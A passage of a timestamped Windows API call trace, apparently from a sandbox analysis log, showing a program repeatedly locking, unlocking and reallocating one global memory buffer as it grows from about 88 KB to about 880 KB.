[0199.240] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.240] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.240] GlobalUnlock (hMem=0x68000c) returned 0
[0199.240] GlobalReAlloc (hMem=0x68000c, dwBytes=0x16000, uFlags=0x2) returned 0x68000c
[0199.240] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.241] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.241] GlobalUnlock (hMem=0x68000c) returned 0
[0199.241] GlobalReAlloc (hMem=0x68000c, dwBytes=0x18000, uFlags=0x2) returned 0x68000c
[0199.241] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.241] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.241] GlobalUnlock (hMem=0x68000c) returned 0
[0199.241] GlobalReAlloc (hMem=0x68000c, dwBytes=0x1a000, uFlags=0x2) returned 0x68000c
[0199.241] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.242] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.242] GlobalUnlock (hMem=0x68000c) returned 0
[0199.242] GlobalReAlloc (hMem=0x68000c, dwBytes=0x1c000, uFlags=0x2) returned 0x68000c
[0199.242] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.242] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.242] GlobalUnlock (hMem=0x68000c) returned 0
[0199.242] GlobalReAlloc (hMem=0x68000c, dwBytes=0x1e000, uFlags=0x2) returned 0x68000c
[0199.242] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.243] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.243] GlobalUnlock (hMem=0x68000c) returned 0
[0199.243] GlobalReAlloc (hMem=0x68000c, dwBytes=0x20000, uFlags=0x2) returned 0x68000c
[0199.243] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.243] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.243] GlobalUnlock (hMem=0x68000c) returned 0
[0199.243] GlobalReAlloc (hMem=0x68000c, dwBytes=0x22000, uFlags=0x2) returned 0x68000c
[0199.245] GlobalLock (hMem=0x68000c) returned 0xb6820
[0199.245] GlobalHandle (pMem=0xb6820) returned 0x68000c
[0199.245] GlobalUnlock (hMem=0x68000c) returned 0
[0199.245] GlobalReAlloc (hMem=0x68000c, dwBytes=0x24000, uFlags=0x2) returned 0x68000c
[0199.245] GlobalLock (hMem=0x68000c) returned 0xb6820
[0199.246] GlobalHandle (pMem=0xb6820) returned 0x68000c
[0199.246] GlobalUnlock (hMem=0x68000c) returned 0
[0199.246] GlobalReAlloc (hMem=0x68000c, dwBytes=0x26000, uFlags=0x2) returned 0x68000c
[0199.247] GlobalLock (hMem=0x68000c) returned 0xda830
[0199.247] GlobalHandle (pMem=0xda830) returned 0x68000c
[0199.247] GlobalUnlock (hMem=0x68000c) returned 0
[0199.247] GlobalReAlloc (hMem=0x68000c, dwBytes=0x28000, uFlags=0x2) returned 0x68000c
[0199.248] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.248] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.248] GlobalUnlock (hMem=0x68000c) returned 0
[0199.248] GlobalReAlloc (hMem=0x68000c, dwBytes=0x2a000, uFlags=0x2) returned 0x68000c
[0199.248] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.248] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.248] GlobalUnlock (hMem=0x68000c) returned 0
[0199.248] GlobalReAlloc (hMem=0x68000c, dwBytes=0x2c000, uFlags=0x2) returned 0x68000c
[0199.249] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.249] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.249] GlobalUnlock (hMem=0x68000c) returned 0
[0199.249] GlobalReAlloc (hMem=0x68000c, dwBytes=0x2e000, uFlags=0x2) returned 0x68000c
[0199.249] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.249] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.249] GlobalUnlock (hMem=0x68000c) returned 0
[0199.249] GlobalReAlloc (hMem=0x68000c, dwBytes=0x30000, uFlags=0x2) returned 0x68000c
[0199.249] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.250] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.250] GlobalUnlock (hMem=0x68000c) returned 0
[0199.250] GlobalReAlloc (hMem=0x68000c, dwBytes=0x32000, uFlags=0x2) returned 0x68000c
[0199.250] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.250] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.250] GlobalUnlock (hMem=0x68000c) returned 0
[0199.250] GlobalReAlloc (hMem=0x68000c, dwBytes=0x34000, uFlags=0x2) returned 0x68000c
[0199.250] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.251] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.251] GlobalUnlock (hMem=0x68000c) returned 0
[0199.251] GlobalReAlloc (hMem=0x68000c, dwBytes=0x36000, uFlags=0x2) returned 0x68000c
[0199.251] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.251] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.251] GlobalUnlock (hMem=0x68000c) returned 0
[0199.251] GlobalReAlloc (hMem=0x68000c, dwBytes=0x38000, uFlags=0x2) returned 0x68000c
[0199.251] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.252] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.252] GlobalUnlock (hMem=0x68000c) returned 0
[0199.252] GlobalReAlloc (hMem=0x68000c, dwBytes=0x3a000, uFlags=0x2) returned 0x68000c
[0199.252] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.252] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.252] GlobalUnlock (hMem=0x68000c) returned 0
[0199.252] GlobalReAlloc (hMem=0x68000c, dwBytes=0x3c000, uFlags=0x2) returned 0x68000c
[0199.253] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.253] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.253] GlobalUnlock (hMem=0x68000c) returned 0
[0199.253] GlobalReAlloc (hMem=0x68000c, dwBytes=0x3e000, uFlags=0x2) returned 0x68000c
[0199.253] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.254] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.254] GlobalUnlock (hMem=0x68000c) returned 0
[0199.254] GlobalReAlloc (hMem=0x68000c, dwBytes=0x40000, uFlags=0x2) returned 0x68000c
[0199.254] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.254] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.254] GlobalUnlock (hMem=0x68000c) returned 0
[0199.254] GlobalReAlloc (hMem=0x68000c, dwBytes=0x42000, uFlags=0x2) returned 0x68000c
[0199.254] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.255] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.255] GlobalUnlock (hMem=0x68000c) returned 0
[0199.255] GlobalReAlloc (hMem=0x68000c, dwBytes=0x44000, uFlags=0x2) returned 0x68000c
[0199.255] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.255] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.255] GlobalUnlock (hMem=0x68000c) returned 0
[0199.255] GlobalReAlloc (hMem=0x68000c, dwBytes=0x46000, uFlags=0x2) returned 0x68000c
[0199.255] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.256] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.256] GlobalUnlock (hMem=0x68000c) returned 0
[0199.256] GlobalReAlloc (hMem=0x68000c, dwBytes=0x48000, uFlags=0x2) returned 0x68000c
[0199.256] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.256] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.256] GlobalUnlock (hMem=0x68000c) returned 0
[0199.256] GlobalReAlloc (hMem=0x68000c, dwBytes=0x4a000, uFlags=0x2) returned 0x68000c
[0199.256] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.257] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.257] GlobalUnlock (hMem=0x68000c) returned 0
[0199.257] GlobalReAlloc (hMem=0x68000c, dwBytes=0x4c000, uFlags=0x2) returned 0x68000c
[0199.257] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.257] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.257] GlobalUnlock (hMem=0x68000c) returned 0
[0199.257] GlobalReAlloc (hMem=0x68000c, dwBytes=0x4e000, uFlags=0x2) returned 0x68000c
[0199.257] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.258] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.258] GlobalUnlock (hMem=0x68000c) returned 0
[0199.258] GlobalReAlloc (hMem=0x68000c, dwBytes=0x50000, uFlags=0x2) returned 0x68000c
[0199.258] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.258] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.258] GlobalUnlock (hMem=0x68000c) returned 0
[0199.258] GlobalReAlloc (hMem=0x68000c, dwBytes=0x52000, uFlags=0x2) returned 0x68000c
[0199.258] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.259] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.259] GlobalUnlock (hMem=0x68000c) returned 0
[0199.259] GlobalReAlloc (hMem=0x68000c, dwBytes=0x54000, uFlags=0x2) returned 0x68000c
[0199.259] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.259] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.259] GlobalUnlock (hMem=0x68000c) returned 0
[0199.259] GlobalReAlloc (hMem=0x68000c, dwBytes=0x56000, uFlags=0x2) returned 0x68000c
[0199.259] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.260] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.260] GlobalUnlock (hMem=0x68000c) returned 0
[0199.260] GlobalReAlloc (hMem=0x68000c, dwBytes=0x58000, uFlags=0x2) returned 0x68000c
[0199.260] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.260] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.260] GlobalUnlock (hMem=0x68000c) returned 0
[0199.260] GlobalReAlloc (hMem=0x68000c, dwBytes=0x5a000, uFlags=0x2) returned 0x68000c
[0199.260] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.261] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.261] GlobalUnlock (hMem=0x68000c) returned 0
[0199.261] GlobalReAlloc (hMem=0x68000c, dwBytes=0x5c000, uFlags=0x2) returned 0x68000c
[0199.261] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.261] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.261] GlobalUnlock (hMem=0x68000c) returned 0
[0199.261] GlobalReAlloc (hMem=0x68000c, dwBytes=0x5e000, uFlags=0x2) returned 0x68000c
[0199.261] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.262] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.262] GlobalUnlock (hMem=0x68000c) returned 0
[0199.262] GlobalReAlloc (hMem=0x68000c, dwBytes=0x60000, uFlags=0x2) returned 0x68000c
[0199.262] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.262] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.262] GlobalUnlock (hMem=0x68000c) returned 0
[0199.262] GlobalReAlloc (hMem=0x68000c, dwBytes=0x62000, uFlags=0x2) returned 0x68000c
[0199.262] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.263] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.263] GlobalUnlock (hMem=0x68000c) returned 0
[0199.263] GlobalReAlloc (hMem=0x68000c, dwBytes=0x64000, uFlags=0x2) returned 0x68000c
[0199.263] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.263] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.263] GlobalUnlock (hMem=0x68000c) returned 0
[0199.263] GlobalReAlloc (hMem=0x68000c, dwBytes=0x66000, uFlags=0x2) returned 0x68000c
[0199.263] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.264] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.264] GlobalUnlock (hMem=0x68000c) returned 0
[0199.264] GlobalReAlloc (hMem=0x68000c, dwBytes=0x68000, uFlags=0x2) returned 0x68000c
[0199.264] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.264] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.264] GlobalUnlock (hMem=0x68000c) returned 0
[0199.264] GlobalReAlloc (hMem=0x68000c, dwBytes=0x6a000, uFlags=0x2) returned 0x68000c
[0199.264] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.265] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.265] GlobalUnlock (hMem=0x68000c) returned 0
[0199.265] GlobalReAlloc (hMem=0x68000c, dwBytes=0x6c000, uFlags=0x2) returned 0x68000c
[0199.269] GlobalLock (hMem=0x68000c) returned 0x100820
[0199.269] GlobalHandle (pMem=0x100820) returned 0x68000c
[0199.269] GlobalUnlock (hMem=0x68000c) returned 0
[0199.269] GlobalReAlloc (hMem=0x68000c, dwBytes=0x6e000, uFlags=0x2) returned 0x68000c
[0199.269] GlobalLock (hMem=0x68000c) returned 0x100820
[0199.270] GlobalHandle (pMem=0x100820) returned 0x68000c
[0199.270] GlobalUnlock (hMem=0x68000c) returned 0
[0199.270] GlobalReAlloc (hMem=0x68000c, dwBytes=0x70000, uFlags=0x2) returned 0x68000c
[0199.281] GlobalLock (hMem=0x68000c) returned 0x2410048
[0199.282] GlobalHandle (pMem=0x2410048) returned 0x68000c
[0199.282] GlobalUnlock (hMem=0x68000c) returned 0
[0199.282] GlobalReAlloc (hMem=0x68000c, dwBytes=0x72000, uFlags=0x2) returned 0x68000c
[0199.287] GlobalLock (hMem=0x68000c) returned 0x2480058
[0199.287] GlobalHandle (pMem=0x2480058) returned 0x68000c
[0199.287] GlobalUnlock (hMem=0x68000c) returned 0
[0199.288] GlobalReAlloc (hMem=0x68000c, dwBytes=0x74000, uFlags=0x2) returned 0x68000c
[0199.288] GlobalLock (hMem=0x68000c) returned 0x2480058
[0199.288] GlobalHandle (pMem=0x2480058) returned 0x68000c
[0199.288] GlobalUnlock (hMem=0x68000c) returned 0
[0199.288] GlobalReAlloc (hMem=0x68000c, dwBytes=0x76000, uFlags=0x2) returned 0x68000c
[0199.300] GlobalLock (hMem=0x68000c) returned 0x96810
[0199.300] GlobalHandle (pMem=0x96810) returned 0x68000c
[0199.300] GlobalUnlock (hMem=0x68000c) returned 0
[0199.300] GlobalReAlloc (hMem=0x68000c, dwBytes=0x78000, uFlags=0x2) returned 0x68000c
[0199.305] GlobalLock (hMem=0x68000c) returned 0x2410048
[0199.306] GlobalHandle (pMem=0x2410048) returned 0x68000c
[0199.306] GlobalUnlock (hMem=0x68000c) returned 0
[0199.306] GlobalReAlloc (hMem=0x68000c, dwBytes=0x7a000, uFlags=0x2) returned 0x68000c
[0199.310] GlobalLock (hMem=0x68000c) returned 0x2488058
[0199.311] GlobalHandle (pMem=0x2488058) returned 0x68000c
[0199.311] GlobalUnlock (hMem=0x68000c) returned 0
[0199.311] GlobalReAlloc (hMem=0x68000c, dwBytes=0x7c000, uFlags=0x2) returned 0x68000c
[0199.311] GlobalLock (hMem=0x68000c) returned 0x2488058
[0199.311] GlobalHandle (pMem=0x2488058) returned 0x68000c
[0199.311] GlobalUnlock (hMem=0x68000c) returned 0
[0199.311] GlobalReAlloc (hMem=0x68000c, dwBytes=0x7e000, uFlags=0x2) returned 0x68000c
[0199.324] GlobalLock (hMem=0x68000c) returned 0x2510048
[0199.324] GlobalHandle (pMem=0x2510048) returned 0x68000c
[0199.324] GlobalUnlock (hMem=0x68000c) returned 0
[0199.324] GlobalReAlloc (hMem=0x68000c, dwBytes=0x80000, uFlags=0x2) returned 0x68000c
[0199.343] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.344] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.344] GlobalUnlock (hMem=0x68000c) returned 0
[0199.344] GlobalReAlloc (hMem=0x68000c, dwBytes=0x82000, uFlags=0x2) returned 0x68000c
[0199.354] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.355] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.355] GlobalUnlock (hMem=0x68000c) returned 0
[0199.355] GlobalReAlloc (hMem=0x68000c, dwBytes=0x84000, uFlags=0x2) returned 0x68000c
[0199.366] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.367] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.367] GlobalUnlock (hMem=0x68000c) returned 0
[0199.367] GlobalReAlloc (hMem=0x68000c, dwBytes=0x86000, uFlags=0x2) returned 0x68000c
[0199.379] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.380] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.380] GlobalUnlock (hMem=0x68000c) returned 0
[0199.380] GlobalReAlloc (hMem=0x68000c, dwBytes=0x88000, uFlags=0x2) returned 0x68000c
[0199.391] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.392] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.392] GlobalUnlock (hMem=0x68000c) returned 0
[0199.392] GlobalReAlloc (hMem=0x68000c, dwBytes=0x8a000, uFlags=0x2) returned 0x68000c
[0199.404] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.405] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.405] GlobalUnlock (hMem=0x68000c) returned 0
[0199.405] GlobalReAlloc (hMem=0x68000c, dwBytes=0x8c000, uFlags=0x2) returned 0x68000c
[0199.416] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.417] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.417] GlobalUnlock (hMem=0x68000c) returned 0
[0199.417] GlobalReAlloc (hMem=0x68000c, dwBytes=0x8e000, uFlags=0x2) returned 0x68000c
[0199.430] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.431] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.431] GlobalUnlock (hMem=0x68000c) returned 0
[0199.431] GlobalReAlloc (hMem=0x68000c, dwBytes=0x90000, uFlags=0x2) returned 0x68000c
[0199.443] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.444] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.444] GlobalUnlock (hMem=0x68000c) returned 0
[0199.444] GlobalReAlloc (hMem=0x68000c, dwBytes=0x92000, uFlags=0x2) returned 0x68000c
[0199.456] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.457] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.457] GlobalUnlock (hMem=0x68000c) returned 0
[0199.457] GlobalReAlloc (hMem=0x68000c, dwBytes=0x94000, uFlags=0x2) returned 0x68000c
[0199.469] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.470] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.470] GlobalUnlock (hMem=0x68000c) returned 0
[0199.470] GlobalReAlloc (hMem=0x68000c, dwBytes=0x96000, uFlags=0x2) returned 0x68000c
[0199.483] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.484] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.484] GlobalUnlock (hMem=0x68000c) returned 0
[0199.484] GlobalReAlloc (hMem=0x68000c, dwBytes=0x98000, uFlags=0x2) returned 0x68000c
[0199.496] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.497] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.497] GlobalUnlock (hMem=0x68000c) returned 0
[0199.497] GlobalReAlloc (hMem=0x68000c, dwBytes=0x9a000, uFlags=0x2) returned 0x68000c
[0199.510] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.511] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.512] GlobalUnlock (hMem=0x68000c) returned 0
[0199.512] GlobalReAlloc (hMem=0x68000c, dwBytes=0x9c000, uFlags=0x2) returned 0x68000c
[0199.525] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.526] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.526] GlobalUnlock (hMem=0x68000c) returned 0
[0199.526] GlobalReAlloc (hMem=0x68000c, dwBytes=0x9e000, uFlags=0x2) returned 0x68000c
[0199.539] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.540] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.540] GlobalUnlock (hMem=0x68000c) returned 0
[0199.540] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa0000, uFlags=0x2) returned 0x68000c
[0199.553] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.554] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.554] GlobalUnlock (hMem=0x68000c) returned 0
[0199.554] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa2000, uFlags=0x2) returned 0x68000c
[0199.570] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.571] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.571] GlobalUnlock (hMem=0x68000c) returned 0
[0199.571] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa4000, uFlags=0x2) returned 0x68000c
[0199.585] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.586] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.586] GlobalUnlock (hMem=0x68000c) returned 0
[0199.586] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa6000, uFlags=0x2) returned 0x68000c
[0199.600] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.601] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.601] GlobalUnlock (hMem=0x68000c) returned 0
[0199.601] GlobalReAlloc (hMem=0x68000c, dwBytes=0xa8000, uFlags=0x2) returned 0x68000c
[0199.612] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.613] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.613] GlobalUnlock (hMem=0x68000c) returned 0
[0199.613] GlobalReAlloc (hMem=0x68000c, dwBytes=0xaa000, uFlags=0x2) returned 0x68000c
[0199.624] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.625] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.625] GlobalUnlock (hMem=0x68000c) returned 0
[0199.625] GlobalReAlloc (hMem=0x68000c, dwBytes=0xac000, uFlags=0x2) returned 0x68000c
[0199.637] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.637] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.637] GlobalUnlock (hMem=0x68000c) returned 0
[0199.637] GlobalReAlloc (hMem=0x68000c, dwBytes=0xae000, uFlags=0x2) returned 0x68000c
[0199.649] GlobalLock (hMem=0x68000c) returned 0x1410020
[0199.650] GlobalHandle (pMem=0x1410020) returned 0x68000c
[0199.650] GlobalUnlock (hMem=0x68000c) returned 0
[0199.650] GlobalReAlloc (hMem=0x68000c, dwBytes=0xb0000, uFlags=0x2) returned 0x68000c
[0199.662] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.663] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.663] GlobalUnlock (hMem=0x68000c) returned 0
[0199.663] GlobalReAlloc (hMem=0x68000c, dwBytes=0xb2000, uFlags=0x2) returned 0x68000c
[0199.675] GlobalLock (hMem=0x68000c) returned 0x2710020
[0199.676] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0199.676] GlobalUnlock (hMem=0x68000c) returned 0
[0199.676] GlobalReAlloc (hMem=0x68000c, dwBytes=0xb4000, uFlags=0x2) returned 0x68000c
[0199.687] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.688] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.688] GlobalUnlock (hMem=0x68000c) returned 0
[0199.688] GlobalReAlloc (hMem=0x68000c, dwBytes=0xb6000, uFlags=0x2) returned 0x68000c
[0199.700] GlobalLock (hMem=0x68000c) returned 0x2710020
[0199.701] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0199.701] GlobalUnlock (hMem=0x68000c) returned 0
[0199.701] GlobalReAlloc (hMem=0x68000c, dwBytes=0xb8000, uFlags=0x2) returned 0x68000c
[0199.714] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.715] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.715] GlobalUnlock (hMem=0x68000c) returned 0
[0199.715] GlobalReAlloc (hMem=0x68000c, dwBytes=0xba000, uFlags=0x2) returned 0x68000c
[0199.727] GlobalLock (hMem=0x68000c) returned 0x2710020
[0199.728] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0199.728] GlobalUnlock (hMem=0x68000c) returned 0
[0199.728] GlobalReAlloc (hMem=0x68000c, dwBytes=0xbc000, uFlags=0x2) returned 0x68000c
[0199.747] GlobalLock (hMem=0x68000c) returned 0x740020
[0199.748] GlobalHandle (pMem=0x740020) returned 0x68000c
[0199.748] GlobalUnlock (hMem=0x68000c) returned 0
[0199.748] GlobalReAlloc (hMem=0x68000c, dwBytes=0xbe000, uFlags=0x2) returned 0x68000c
[0199.761] GlobalLock (hMem=0x68000c) returned 0x2710020
[0199.762] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0199.762] GlobalUnlock (hMem=0x68000c) returned 0
[0199.762] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc0000, uFlags=0x2) returned 0x68000c
[0199.775] GlobalLock (hMem=0x68000c) returned 0x27d0020
[0199.776] GlobalHandle (pMem=0x27d0020) returned 0x68000c
[0199.776] GlobalUnlock (hMem=0x68000c) returned 0
[0199.776] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc2000, uFlags=0x2) returned 0x68000c
[0199.789] GlobalLock (hMem=0x68000c) returned 0x28a0020
[0199.789] GlobalHandle (pMem=0x28a0020) returned 0x68000c
[0199.789] GlobalUnlock (hMem=0x68000c) returned 0
[0199.789] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc4000, uFlags=0x2) returned 0x68000c
[0199.849] GlobalLock (hMem=0x68000c) returned 0x2710020
[0199.850] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0199.850] GlobalUnlock (hMem=0x68000c) returned 0
[0199.850] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc6000, uFlags=0x2) returned 0x68000c
[0199.863] GlobalLock (hMem=0x68000c) returned 0x27e0020
[0199.864] GlobalHandle (pMem=0x27e0020) returned 0x68000c
[0199.864] GlobalUnlock (hMem=0x68000c) returned 0
[0199.864] GlobalReAlloc (hMem=0x68000c, dwBytes=0xc8000, uFlags=0x2) returned 0x68000c
[0199.880] GlobalLock (hMem=0x68000c) returned 0x2710020
[0199.881] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0199.881] GlobalUnlock (hMem=0x68000c) returned 0
[0199.881] GlobalReAlloc (hMem=0x68000c, dwBytes=0xca000, uFlags=0x2) returned 0x68000c
[0199.906] GlobalLock (hMem=0x68000c) returned 0x27e0020
[0199.907] GlobalHandle (pMem=0x27e0020) returned 0x68000c
[0199.907] GlobalUnlock (hMem=0x68000c) returned 0
[0199.907] GlobalReAlloc (hMem=0x68000c, dwBytes=0xcc000, uFlags=0x2) returned 0x68000c
[0199.924] GlobalLock (hMem=0x68000c) returned 0x2710020
[0199.925] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0199.925] GlobalUnlock (hMem=0x68000c) returned 0
[0199.925] GlobalReAlloc (hMem=0x68000c, dwBytes=0xce000, uFlags=0x2) returned 0x68000c
[0199.991] GlobalLock (hMem=0x68000c) returned 0x27e0020
[0199.992] GlobalHandle (pMem=0x27e0020) returned 0x68000c
[0199.992] GlobalUnlock (hMem=0x68000c) returned 0
[0199.992] GlobalReAlloc (hMem=0x68000c, dwBytes=0xd0000, uFlags=0x2) returned 0x68000c
[0200.006] GlobalLock (hMem=0x68000c) returned 0x28b0020
[0200.006] GlobalHandle (pMem=0x28b0020) returned 0x68000c
[0200.007] GlobalUnlock (hMem=0x68000c) returned 0
[0200.007] GlobalReAlloc (hMem=0x68000c, dwBytes=0xd2000, uFlags=0x2) returned 0x68000c
[0200.022] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.023] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.023] GlobalUnlock (hMem=0x68000c) returned 0
[0200.023] GlobalReAlloc (hMem=0x68000c, dwBytes=0xd4000, uFlags=0x2) returned 0x68000c
[0200.037] GlobalLock (hMem=0x68000c) returned 0x27f0020
[0200.038] GlobalHandle (pMem=0x27f0020) returned 0x68000c
[0200.038] GlobalUnlock (hMem=0x68000c) returned 0
[0200.038] GlobalReAlloc (hMem=0x68000c, dwBytes=0xd6000, uFlags=0x2) returned 0x68000c
[0200.052] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.053] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.053] GlobalUnlock (hMem=0x68000c) returned 0
[0200.053] GlobalReAlloc (hMem=0x68000c, dwBytes=0xd8000, uFlags=0x2) returned 0x68000c
[0200.067] GlobalLock (hMem=0x68000c) returned 0x27f0020
[0200.068] GlobalHandle (pMem=0x27f0020) returned 0x68000c
[0200.068] GlobalUnlock (hMem=0x68000c) returned 0
[0200.068] GlobalReAlloc (hMem=0x68000c, dwBytes=0xda000, uFlags=0x2) returned 0x68000c
[0200.101] GlobalLock (hMem=0x68000c) returned 0x2710020
[0200.102] GlobalHandle (pMem=0x2710020) returned 0x68000c
[0200.102] GlobalUnlock (hMem=0x68000c) returned 0
[0200.102] GlobalReAlloc (hMem=0x68000c, dwBytes=0xdc000, uFlags=0x2) returned 0x68000c
[0200.117] GlobalLock (hMem=0x68000c) returned 0x27f0020
